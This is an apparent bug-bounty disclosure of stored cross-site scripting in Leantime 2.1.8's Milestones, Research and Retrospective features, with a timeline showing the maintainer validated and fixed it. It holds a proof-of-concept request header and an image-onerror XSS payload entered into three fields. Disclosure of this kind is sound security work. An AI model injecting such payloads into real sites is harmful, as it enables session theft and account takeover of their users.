Cross-site Scripting (XSS) - Stored in leantime/leantime


Reported on

Oct 12th 2021


Multiple Stored XSS on featuers 'Milestones' , 'Research', 'Retrospective' at Leantime 2.1.8

Proof of Concept

// PoC.req
POST /leantime/public/tickets/editMilestone/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 157
Connection: close
Cookie: sid=e48bc373a563a82ae266820d40707a63b9c0bad4-3cef7db646d7f8424c47025854198bf8d39caede
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


Step to Reproduct


Goto Milestones choose to Add Milestones

At 'Milestone Title' input with payload: "><iMg SrC="x" oNeRRor="alert(1);">


Goto Research, at Board choose to Add new

At 'Hypothesis' input with payload: "><iMg SrC="x" oNeRRor="alert(1);">


Goto Retrospective, at Board choose to Add new

At 'Description' input with payload: "><iMg SrC="x" oNeRRor="alert(1);">


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the leantime team and are waiting to hear back 2 years ago
lethanhphuc modified the report
2 years ago
Marcel Folaron validated this vulnerability 2 years ago
noobpk has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a
2 years ago
Marcel Folaron marked this as fixed with commit 22a6da 2 years ago
lethanhphuc has been awarded the fix bounty
to join this conversation